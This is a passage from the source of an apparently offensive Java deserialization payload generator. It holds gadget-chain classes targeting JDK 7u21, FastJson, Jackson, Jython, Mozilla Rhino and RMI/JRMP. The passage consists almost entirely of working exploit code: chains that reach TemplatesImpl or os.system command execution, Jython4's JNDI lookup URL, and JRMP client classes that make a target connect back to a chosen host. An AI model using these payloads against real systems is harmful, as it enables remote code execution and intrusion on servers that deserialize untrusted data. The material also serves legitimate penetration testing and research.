java.util.HashMap; 16 | import java.util.LinkedHashSet; 17 | 18 | /** 19 | * @author Whoopsunix 20 | */ 21 | @Dependencies({"JDK:JDK7u21"}) 22 | @Authors({Authors.Whoopsunix}) 23 | @Sink({Sink.TemplatesImpl}) 24 | public class JDK7u21Lite implements ObjectPayload { 25 | 26 | public static void main(String[] args) throws Exception { 27 | PayloadRunner.run(JDK7u21Lite.class, args); 28 | } 29 | 30 | public Object getObject(SinksHelper sinksHelper) throws Exception { 31 | // sink 32 | Object sinkObject = SinkScheduler.builder(sinksHelper); 33 | 34 | Object kickOffObject = getChain(sinkObject); 35 | 36 | return kickOffObject; 37 | } 38 | 39 | public Object getChain(Object templates) throws Exception { 40 | 41 | InvocationHandler handler = KickOff.annotationInvocationHandler(new HashMap()); 42 | Reflections.setFieldValue(handler, "type", Templates.class); 43 | Templates proxy = KickOff.createProxy(handler, Templates.class); 44 | 45 | String zeroHashCodeStr = "f5a5a608"; 46 | 47 | LinkedHashSet set = new LinkedHashSet(); 48 | set.add(templates); 49 | set.add(proxy); 50 | 51 | HashMap map = new HashMap(); 52 | map.put(zeroHashCodeStr, templates); 53 | 54 | Reflections.setFieldValue(handler, "memberValues", map); 55 | return set; 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/jdk/JDK7u21variant.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.jdk; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.RanDomUtils; 12 | import com.ppp.utils.Reflections; 13 | 14 | import javax.xml.transform.Templates; 15 | import java.lang.reflect.InvocationHandler; 16 | import java.rmi.MarshalledObject; 17 | import java.util.HashMap; 18 | import java.util.LinkedHashSet; 19 | 20 | /** 21 | * @author Whoopsunix 22 | */ 23 | @Dependencies({"JDK:JDK7u21"}) 24 | @Authors({Authors.POTATS0}) 25 | @Sink({Sink.TemplatesImpl}) 26 | public class JDK7u21variant implements ObjectPayload { 27 | 28 | public static void main(String[] args) throws Exception { 29 | PayloadRunner.run(JDK7u21variant.class, args); 30 | } 31 | 32 | public Object getObject(SinksHelper sinksHelper) throws Exception { 33 | // sink 34 | Object sinkObject = SinkScheduler.builder(sinksHelper); 35 | 36 | Object kickOffObject = getChain(sinkObject); 37 | 38 | return kickOffObject; 39 | } 40 | 41 | public Object getChain(Object templates) throws Exception { 42 | String s = RanDomUtils.generateRandomString(1); 43 | 44 | String zeroHashCodeStr = "f5a5a608"; 45 | 46 | HashMap map = new HashMap(); 47 | map.put(zeroHashCodeStr, s); 48 | 49 | InvocationHandler handler = KickOff.annotationInvocationHandler(map); 50 | Reflections.setFieldValue(handler, "type", Templates.class); 51 | Templates proxy = KickOff.createProxy(handler, Templates.class); 52 | 53 | LinkedHashSet hashset = new LinkedHashSet(); 54 | hashset.add(templates); 55 | hashset.add(proxy); 56 | 57 | Reflections.setFieldValue(templates, "_auxClasses", null); 58 | Reflections.setFieldValue(templates, "_class", null); 59 | 60 | map.put(zeroHashCodeStr, templates); 61 | 62 | MarshalledObject marshalledObject = new MarshalledObject(hashset); 63 | Reflections.setFieldValue(handler, "type", MarshalledObject.class); 64 | 65 | hashset = new LinkedHashSet(); // maintain order 66 | hashset.add(marshalledObject); 67 | hashset.add(proxy); 68 | map.put(zeroHashCodeStr, marshalledObject); // swap in real object 69 | return hashset; 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/jrmp/JRMPClient.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.jrmp; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.EnchantType; 11 | import com.ppp.sinks.annotation.Sink; 12 | import sun.rmi.server.UnicastRef; 13 | import sun.rmi.transport.LiveRef; 14 | import sun.rmi.transport.tcp.TCPEndpoint; 15 | 16 | import java.lang.reflect.Proxy; 17 | import java.rmi.registry.Registry; 18 | import java.rmi.server.ObjID; 19 | import java.rmi.server.RemoteObjectInvocationHandler; 20 | import java.util.Random; 21 | 22 | /** 23 | * @author Whoopsunix 24 | */ 25 | @Authors({Authors.MBECHLER}) 26 | @Dependencies("JDK:<8u231") 27 | @Sink({Sink.JNDI}) 28 | @EnchantType({EnchantType.JRMP}) 29 | public class JRMPClient implements ObjectPayload { 30 | 31 | public static void main(String[] args) throws Exception { 32 | SinksHelper sinksHelper = new SinksHelper(); 33 | sinksHelper.setSink(JRMPClient.class.getAnnotation(Sink.class).value()[0]); 34 | sinksHelper.setEnchant(EnchantType.JRMP); 35 | sinksHelper.setHost("127.0.0.1"); 36 | sinksHelper.setPort(1099); 37 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 38 | javaClassHelper.setExtendsAbstractTranslet(true); 39 | sinksHelper.setJavaClassHelper(javaClassHelper); 40 | 41 | PayloadRunner.run(JRMPClient.class, args, sinksHelper); 42 | } 43 | 44 | public Object getObject(SinksHelper sinksHelper) throws Exception { 45 | // sink 46 | SinkScheduler.builder(sinksHelper); 47 | String host = sinksHelper.getHost(); 48 | Integer port = sinksHelper.getPort(); 49 | 50 | Object kickOffObject = getChain(host, port); 51 | 52 | return kickOffObject; 53 | } 54 | 55 | public Object getChain(String host, int port) throws Exception { 56 | ObjID id = new ObjID(new Random().nextInt()); // RMI registry 57 | TCPEndpoint te = new TCPEndpoint(host, port); 58 | UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); 59 | RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref); 60 | Registry proxy = (Registry) Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[]{ 61 | Registry.class 62 | }, obj); 63 | return proxy; 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/jrmp/JRMPClient2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.jrmp; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.EnchantType; 11 | import com.ppp.sinks.annotation.Sink; 12 | import com.ppp.utils.Reflections; 13 | import sun.rmi.server.UnicastRef; 14 | import sun.rmi.transport.LiveRef; 15 | import sun.rmi.transport.tcp.TCPEndpoint; 16 | 17 | import java.lang.reflect.Proxy; 18 | import java.rmi.server.ObjID; 19 | import java.rmi.server.RMIServerSocketFactory; 20 | import java.rmi.server.RemoteObjectInvocationHandler; 21 | import java.rmi.server.UnicastRemoteObject; 22 | import java.util.Random; 23 | 24 | /** 25 | * @author Whoopsunix 26 | */ 27 | @Authors({Authors.h0ng10}) 28 | @Dependencies("JDK:<8u241") 29 | @Sink({Sink.JNDI}) 30 | @EnchantType({EnchantType.JRMP}) 31 | public class JRMPClient2 implements ObjectPayload { 32 | 33 | public static void main(String[] args) throws Exception { 34 | SinksHelper sinksHelper = new SinksHelper(); 35 | sinksHelper.setSink(JRMPClient2.class.getAnnotation(Sink.class).value()[0]); 36 | sinksHelper.setEnchant(EnchantType.JRMP); 37 | sinksHelper.setHost("127.0.0.1"); 38 | sinksHelper.setPort(1099); 39 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 40 | javaClassHelper.setExtendsAbstractTranslet(true); 41 | sinksHelper.setJavaClassHelper(javaClassHelper); 42 | 43 | PayloadRunner.run(JRMPClient2.class, args, sinksHelper); 44 | } 45 | 46 | public Object getObject(SinksHelper sinksHelper) throws Exception { 47 | // sink 48 | SinkScheduler.builder(sinksHelper); 49 | String host = sinksHelper.getHost(); 50 | Integer port = sinksHelper.getPort(); 51 | 52 | Object kickOffObject = getChain(host, port); 53 | 54 | return kickOffObject; 55 | } 56 | 57 | public Object getChain(String host, int port) throws Exception { 58 | ObjID id = new ObjID(new Random().nextInt()); // RMI registry 59 | 60 | TCPEndpoint te = new TCPEndpoint(host, port); 61 | UnicastRef refObject = new UnicastRef(new LiveRef(id, te, false)); 62 | 63 | RemoteObjectInvocationHandler myInvocationHandler = new RemoteObjectInvocationHandler(refObject); 64 | 65 | RMIServerSocketFactory handcraftedSSF = (RMIServerSocketFactory) Proxy.newProxyInstance( 66 | RMIServerSocketFactory.class.getClassLoader(), 67 | new Class[]{RMIServerSocketFactory.class, java.rmi.Remote.class}, 68 | myInvocationHandler); 69 | 70 | UnicastRemoteObject myRemoteObject = (UnicastRemoteObject) Reflections.newInstance(UnicastRemoteObject.class, new Class[]{}, new Object[]{}); 71 | Reflections.setFieldValue(myRemoteObject, "ssf", handcraftedSSF); 72 | 73 | return myRemoteObject; 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/jrmp/JRMPListener.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.jrmp; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.EnchantType; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.Reflections; 12 | import sun.rmi.server.ActivationGroupImpl; 13 | import sun.rmi.server.UnicastServerRef; 14 | 15 | import java.rmi.server.RemoteObject; 16 | import java.rmi.server.RemoteRef; 17 | import java.rmi.server.UnicastRemoteObject; 18 | 19 | /** 20 | * @author Whoopsunix 21 | */ 22 | @Authors({Authors.MBECHLER}) 23 | @Dependencies("JDK:<8u121") 24 | @Sink({Sink.JNDI}) 25 | public class JRMPListener implements ObjectPayload { 26 | 27 | public static void main(String[] args) throws Exception { 28 | SinksHelper sinksHelper = new SinksHelper(); 29 | sinksHelper.setSink(JRMPListener.class.getAnnotation(Sink.class).value()[0]); 30 | sinksHelper.setEnchant(EnchantType.DEFAULT); 31 | sinksHelper.setPort(1099); 32 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 33 | javaClassHelper.setExtendsAbstractTranslet(true); 34 | sinksHelper.setJavaClassHelper(javaClassHelper); 35 | 36 | PayloadRunner.run(JRMPListener.class, args, sinksHelper); 37 | } 38 | 39 | public Object getObject(SinksHelper sinksHelper) throws Exception { 40 | // sink 41 | Integer port = sinksHelper.getPort(); 42 | 43 | Object kickOffObject = getChain(port); 44 | 45 | return kickOffObject; 46 | } 47 | 48 | public Object getChain(int port) throws Exception { 49 | UnicastRemoteObject uro = Reflections.createWithConstructor(ActivationGroupImpl.class, RemoteObject.class, new Class[]{ 50 | RemoteRef.class 51 | }, new Object[]{ 52 | new UnicastServerRef(port) 53 | }); 54 | 55 | Reflections.getField(UnicastRemoteObject.class, "port").set(uro, port); 56 | return uro; 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/json/FastJson.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.json; 2 | 3 | import com.alibaba.fastjson.JSONArray; 4 | import com.ppp.KickOff; 5 | import com.ppp.ObjectPayload; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.chain.WrapSerialization; 9 | import com.ppp.secmgr.PayloadRunner; 10 | import com.ppp.sinks.SinkScheduler; 11 | import com.ppp.sinks.SinksHelper; 12 | import com.ppp.sinks.annotation.Sink; 13 | import com.ppp.utils.Reflections; 14 | 15 | import javax.management.BadAttributeValueExpException; 16 | import java.util.HashMap; 17 | 18 | /** 19 | * @author Whoopsunix 20 | */ 21 | @Dependencies({"com.alibaba:fastjson:<=1.2.83"}) 22 | @Authors({Authors.Y4tacker, Authors.oneueo}) 23 | @Sink({Sink.TemplatesImpl}) 24 | public class FastJson implements ObjectPayload { 25 | 26 | public static void main(String[] args) throws Exception { 27 | PayloadRunner.run(FastJson.class, args); 28 | } 29 | 30 | public Object getObject(SinksHelper sinksHelper) throws Exception { 31 | // sink 32 | Object sinkObject = SinkScheduler.builder(sinksHelper); 33 | 34 | // wrap 35 | if (sinksHelper.getWrapSerialization() != null) { 36 | Object o = WrapSerialization.scheduler(sinkObject, sinksHelper); 37 | sinkObject = (o != null) ? o : sinkObject; 38 | } 39 | 40 | Object kickOffObject = getChain(sinkObject); 41 | 42 | return kickOffObject; 43 | } 44 | 45 | public Object getChain(Object templates) throws Exception { 46 | JSONArray jsonArray = new JSONArray(); 47 | jsonArray.add(templates); 48 | 49 | BadAttributeValueExpException badAttributeValueExpException = KickOff.badAttributeValueExpException(jsonArray); 50 | 51 | HashMap hashMap = new HashMap(); 52 | hashMap.put(templates, badAttributeValueExpException); 53 | return hashMap; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/json/FastJson2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.json; 2 | 3 | import com.alibaba.fastjson2.JSONArray; 4 | import com.ppp.KickOff; 5 | import com.ppp.ObjectPayload; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.chain.WrapSerialization; 9 | import com.ppp.secmgr.PayloadRunner; 10 | import com.ppp.sinks.SinkScheduler; 11 | import com.ppp.sinks.SinksHelper; 12 | import com.ppp.sinks.annotation.Sink; 13 | 14 | import javax.management.BadAttributeValueExpException; 15 | import java.util.HashMap; 16 | 17 | /** 18 | * @author Whoopsunix 19 | */ 20 | @Dependencies({"com.alibaba:fastjson2:<=2.0.26"}) 21 | @Authors({Authors.Y4tacker}) 22 | @Sink({Sink.TemplatesImpl}) 23 | public class FastJson2 implements ObjectPayload { 24 | 25 | public static void main(String[] args) throws Exception { 26 | PayloadRunner.run(FastJson2.class, args); 27 | } 28 | 29 | public Object getObject(SinksHelper sinksHelper) throws Exception { 30 | // sink 31 | Object sinkObject = SinkScheduler.builder(sinksHelper); 32 | 33 | // wrap 34 | if (sinksHelper.getWrapSerialization() != null) { 35 | Object o = WrapSerialization.scheduler(sinkObject, sinksHelper); 36 | sinkObject = (o != null) ? o : sinkObject; 37 | } 38 | 39 | Object kickOffObject = getChain(sinkObject); 40 | 41 | return kickOffObject; 42 | } 43 | 44 | public Object getChain(Object templates) throws Exception { 45 | JSONArray jsonArray = new JSONArray(); 46 | jsonArray.add(templates); 47 | 48 | BadAttributeValueExpException badAttributeValueExpException = KickOff.badAttributeValueExpException(jsonArray); 49 | 50 | HashMap hashMap = new HashMap(); 51 | hashMap.put(templates, badAttributeValueExpException); 52 | return hashMap; 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/json/Jackson.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.json; 2 | 3 | import com.fasterxml.jackson.databind.node.POJONode; 4 | import com.ppp.KickOff; 5 | import com.ppp.ObjectPayload; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.chain.WrapSerialization; 9 | import com.ppp.secmgr.PayloadRunner; 10 | import com.ppp.sinks.SinkScheduler; 11 | import com.ppp.sinks.SinksHelper; 12 | import com.ppp.sinks.annotation.Sink; 13 | import com.ppp.utils.Reflections; 14 | import javassist.ClassPool; 15 | import javassist.CtClass; 16 | import javassist.CtMethod; 17 | 18 | import javax.management.BadAttributeValueExpException; 19 | import java.util.HashMap; 20 | 21 | /** 22 | * @author Whoopsunix 23 | */ 24 | @Dependencies({"com.fasterxml.jackson.core:jackson-databind:<=2.15.2"}) 25 | @Authors({Authors.Y4ER}) 26 | @Sink({Sink.TemplatesImpl}) 27 | public class Jackson implements ObjectPayload { 28 | 29 | public static void main(String[] args) throws Exception { 30 | PayloadRunner.run(Jackson.class, args); 31 | } 32 | 33 | public Object getObject(SinksHelper sinksHelper) throws Exception { 34 | // sink 35 | Object sinkObject = SinkScheduler.builder(sinksHelper); 36 | 37 | // wrap 38 | if (sinksHelper.getWrapSerialization() != null) { 39 | Object o = WrapSerialization.scheduler(sinkObject, sinksHelper); 40 | sinkObject = (o != null) ? o : sinkObject; 41 | } 42 | 43 | Object kickOffObject = getChain(sinkObject); 44 | 45 | return kickOffObject; 46 | } 47 | 48 | public Object getChain(Object templates) throws Exception { 49 | // 将修改后的CtClass加载至当前线程的上下文类加载器中 50 | CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode"); 51 | CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace"); 52 | ctClass.removeMethod(writeReplace); 53 | ctClass.toClass(); 54 | 55 | POJONode node = new POJONode(templates); 56 | 57 | BadAttributeValueExpException badAttributeValueExpException = KickOff.badAttributeValueExpException(node); 58 | 59 | HashMap hashMap = new HashMap(); 60 | hashMap.put(templates, badAttributeValueExpException); 61 | 62 | return hashMap; 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/json/Jackson2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.json; 2 | 3 | import com.fasterxml.jackson.databind.node.POJONode; 4 | import com.ppp.KickOff; 5 | import com.ppp.ObjectPayload; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.chain.WrapSerialization; 9 | import com.ppp.secmgr.PayloadRunner; 10 | import com.ppp.sinks.SinkScheduler; 11 | import com.ppp.sinks.SinksHelper; 12 | import com.ppp.sinks.annotation.Sink; 13 | import javassist.ClassPool; 14 | import javassist.CtClass; 15 | import javassist.CtMethod; 16 | import org.springframework.aop.framework.AdvisedSupport; 17 | 18 | import javax.management.BadAttributeValueExpException; 19 | import javax.xml.transform.Templates; 20 | import java.lang.reflect.Constructor; 21 | import java.lang.reflect.InvocationHandler; 22 | import java.lang.reflect.Proxy; 23 | import java.util.HashMap; 24 | 25 | /** 26 | * @author Whoopsunix 27 | * 处理不稳定性 28 | * Ref: https://xz.aliyun.com/t/12846 29 | */ 30 | @Dependencies({"com.fasterxml.jackson.core:jackson-databind:<=2.15.2", "org.springframework:spring-aop:x"}) 31 | @Authors({Authors.COKEBEER}) 32 | @Sink({Sink.TemplatesImpl}) 33 | public class Jackson2 implements ObjectPayload { 34 | 35 | public static void main(String[] args) throws Exception { 36 | PayloadRunner.run(Jackson2.class, args); 37 | } 38 | 39 | public Object getObject(SinksHelper sinksHelper) throws Exception { 40 | // sink 41 | Object sinkObject = SinkScheduler.builder(sinksHelper); 42 | 43 | Object kickOffObject = getChain(sinkObject); 44 | 45 | return kickOffObject; 46 | } 47 | 48 | public Object getChain(Object templates) throws Exception { 49 | AdvisedSupport advisedSupport = new AdvisedSupport(); 50 | advisedSupport.setTarget(templates); 51 | Constructor constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class); 52 | constructor.setAccessible(true); 53 | InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport); 54 | Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler); 55 | 56 | CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode"); 57 | CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace"); 58 | ctClass.removeMethod(writeReplace); 59 | ctClass.toClass(); 60 | 61 | POJONode node = new POJONode(proxy); 62 | 63 | BadAttributeValueExpException badAttributeValueExpException = KickOff.badAttributeValueExpException(node); 64 | 65 | HashMap hashMap = new HashMap(); 66 | hashMap.put(templates, badAttributeValueExpException); 67 | 68 | return hashMap; 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/jython/Jython2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.jython; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.Reflections; 11 | import org.python.core.*; 12 | 13 | import java.lang.reflect.Proxy; 14 | import java.math.BigInteger; 15 | import java.util.Comparator; 16 | import java.util.PriorityQueue; 17 | 18 | /** 19 | * Credits: Alvaro Munoz (@pwntester), Christian Schneider (@cschneider4711), 20 | * and Yorick Koster (@ykoster) 21 | *

22 | * This version of Jython2 executes a command through os.system(). 23 | * Based on Jython1 from @pwntester & @cschneider4711 24 | */ 25 | @Dependencies({"org.python:jython-standalone:2.5.2"}) 26 | @Authors({Authors.PWNTESTER, Authors.CSCHNEIDER4711, Authors.YKOSTER}) 27 | @Sink({Sink.Jython}) 28 | public class Jython2 implements ObjectPayload { 29 | 30 | public static void main(String[] args) throws Exception { 31 | PayloadRunner.run(Jython2.class, args); 32 | } 33 | 34 | public Object getObject(SinksHelper sinksHelper) throws Exception { 35 | // sink 36 | Object sinkObject = SinkScheduler.builder(sinksHelper); 37 | 38 | Object kickOffObject = getChain(sinkObject); 39 | 40 | return kickOffObject; 41 | } 42 | 43 | public Object getChain(Object sinkObject) throws Exception { 44 | String pythonCode = (String) sinkObject; 45 | String code = 46 | "740000" + // 0 LOAD_GLOBAL 0 (eval) 47 | "640100" + // 3 LOAD_CONST 1 ("__import__('os', globals(), locals(), ['system'], 0).system('')") 48 | "830100" + // 6 CALL_FUNCTION 1 49 | "01" + // 9 POP_TOP 50 | "640000" + //10 LOAD_CONST 0 (None) 51 | "53"; //13 RETURN_VALUE 52 | // PyObject[] consts = new PyObject[]{new PyString(""), new PyString("__import__('os', globals(), locals(), ['system'], 0).system('" + command.replace("'", "\\'") + "')")}; 53 | PyObject[] consts = new PyObject[]{new PyString(""), new PyString(pythonCode)}; 54 | String[] names = new String[]{"eval"}; 55 | 56 | // Generating PyBytecode wrapper for our python bytecode 57 | PyBytecode codeobj = new PyBytecode(2, 2, 10, 64, "", consts, names, new String[]{"", ""}, "noname", "", 0, ""); 58 | Reflections.setFieldValue(codeobj, "co_code", new BigInteger(code, 16).toByteArray()); 59 | 60 | // Create a PyFunction Invocation handler that will call our python bytecode when intercepting any method 61 | PyFunction handler = new PyFunction(new PyStringMap(), null, codeobj); 62 | 63 | // Prepare Trigger Gadget 64 | Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class[]{Comparator.class}, handler); 65 | PriorityQueue priorityQueue = new PriorityQueue(2, comparator); 66 | Object[] queue = new Object[]{1, 1}; 67 | Reflections.setFieldValue(priorityQueue, "queue", queue); 68 | Reflections.setFieldValue(priorityQueue, "size", 2); 69 | 70 | return priorityQueue; 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/jython/Jython4.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.jython; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.EnchantType; 11 | import com.ppp.sinks.annotation.Sink; 12 | import com.ppp.utils.RanDomUtils; 13 | import jdk.internal.dynalink.support.Lookup; 14 | import org.python.core.PyMethod; 15 | import org.python.core.PyString; 16 | import sun.misc.Unsafe; 17 | 18 | import java.lang.reflect.Field; 19 | import java.lang.reflect.Proxy; 20 | import java.util.Comparator; 21 | import java.util.PriorityQueue; 22 | 23 | @Dependencies({"org.python:jython-standalone:2.7.3"}) 24 | @Authors({Authors.ZDI}) 25 | @Sink({Sink.JNDI}) 26 | public class Jython4 implements ObjectPayload { 27 | 28 | public static void main(String[] args) throws Exception { 29 | // PayloadRunner.run(Jython4.class, args); 30 | 31 | SinksHelper sinksHelper = new SinksHelper(); 32 | sinksHelper.setSink(Jython4.class.getAnnotation(Sink.class).value()[0]); 33 | sinksHelper.setEnchant(EnchantType.DEFAULT); 34 | sinksHelper.setCommand("rmi://127.0.0.1:1099/wtkwre"); 35 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 36 | javaClassHelper.setExtendsAbstractTranslet(true); 37 | sinksHelper.setJavaClassHelper(javaClassHelper); 38 | 39 | PayloadRunner.run(Jython4.class, args, sinksHelper); 40 | } 41 | 42 | public Object getObject(SinksHelper sinksHelper) throws Exception { 43 | // sink 44 | String url = (String) SinkScheduler.builder(sinksHelper); 45 | 46 | Object kickOffObject = getChain(url); 47 | 48 | return kickOffObject; 49 | } 50 | 51 | public Object getChain(String url) throws Exception { 52 | String s = RanDomUtils.generateRandomString(1); 53 | 54 | Field unsafeField = Unsafe.class.getDeclaredField("theUnsafe"); 55 | unsafeField.setAccessible(true); 56 | Unsafe unsafe = (Unsafe) unsafeField.get(null); 57 | 58 | PyMethod pyMethod = (PyMethod) unsafe.allocateInstance(PyMethod.class); 59 | pyMethod.__func__ = new com.ziclix.python.sql.connect.Lookup(); 60 | pyMethod.im_class = new PyString().getType(); 61 | 62 | Comparator c = (Comparator) Proxy.newProxyInstance( 63 | Lookup.class.getClassLoader(), 64 | new Class[]{Comparator.class}, 65 | pyMethod 66 | ); 67 | PriorityQueue priorityQueue = new PriorityQueue(2, c); 68 | 69 | Object[] queue = new Object[]{ 70 | new PyString(url), 71 | s 72 | }; 73 | 74 | Field f = priorityQueue.getClass().getDeclaredField("queue"); 75 | f.setAccessible(true); 76 | f.set(priorityQueue, queue); 77 | Field f2 = priorityQueue.getClass().getDeclaredField("size"); 78 | f2.setAccessible(true); 79 | f2.set(priorityQueue, 2); 80 | 81 | return priorityQueue; 82 | 83 | } 84 | } 85 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/mozillarhino/MozillaRhino1.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.mozillarhino; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.Reflections; 12 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 13 | import org.mozilla.javascript.*; 14 | 15 | import java.lang.reflect.Method; 16 | 17 | /* 18 | by @matthias_kaiser 19 | */ 20 | @Dependencies({"rhino:js:1.7R2"}) 21 | @Authors({Authors.MATTHIASKAISER}) 22 | @Sink({Sink.TemplatesImpl}) 23 | public class MozillaRhino1 implements ObjectPayload { 24 | 25 | public static void main(String[] args) throws Exception { 26 | PayloadRunner.run(MozillaRhino1.class, args); 27 | } 28 | 29 | public Object getObject(SinksHelper sinksHelper) throws Exception { 30 | // sink 31 | Object sinkObject = SinkScheduler.builder(sinksHelper); 32 | 33 | Object kickOffObject = getChain(sinkObject); 34 | 35 | return kickOffObject; 36 | } 37 | 38 | public Object getChain(Object templates) throws Exception { 39 | IdScriptableObject idScriptableObject = (IdScriptableObject) Reflections.newInstance("org.mozilla.javascript.NativeError"); 40 | 41 | Context context = Context.enter(); 42 | 43 | NativeObject scriptableObject = (NativeObject) context.initStandardObjects(); 44 | 45 | Method enterMethod = Context.class.getDeclaredMethod("enter"); 46 | NativeJavaMethod method = new NativeJavaMethod(enterMethod, "name"); 47 | idScriptableObject.setGetterOrSetter("name", 0, method, false); 48 | 49 | Method newTransformer = TemplatesImpl.class.getDeclaredMethod("newTransformer"); 50 | NativeJavaMethod nativeJavaMethod = new NativeJavaMethod(newTransformer, "message"); 51 | idScriptableObject.setGetterOrSetter("message", 0, nativeJavaMethod, false); 52 | 53 | Method getSlot = ScriptableObject.class.getDeclaredMethod("getSlot", String.class, int.class, int.class); 54 | Reflections.setAccessible(getSlot); 55 | Object slot = getSlot.invoke(idScriptableObject, "name", 0, 1); 56 | 57 | Object memberboxes = Reflections.newInstance("org.mozilla.javascript.MemberBox", enterMethod); 58 | Reflections.setFieldValue(slot, "getter", memberboxes); 59 | 60 | 61 | NativeJavaObject nativeObject = new NativeJavaObject(scriptableObject, templates, TemplatesImpl.class); 62 | idScriptableObject.setPrototype(nativeObject); 63 | 64 | return KickOff.badAttributeValueExpException(idScriptableObject); 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/myface/Myfaces2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.myface; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.EnchantType; 10 | import com.ppp.sinks.annotation.Sink; 11 | 12 | /** 13 | * ValueExpressionImpl.getValue(ELContext) 14 | * ValueExpressionMethodExpression.getMethodExpression(ELContext) 15 | * ValueExpressionMethodExpression.getMethodExpression() 16 | * ValueExpressionMethodExpression.hashCode() 17 | * HashMap.hash(Object) 18 | * HashMap.readObject(ObjectInputStream) 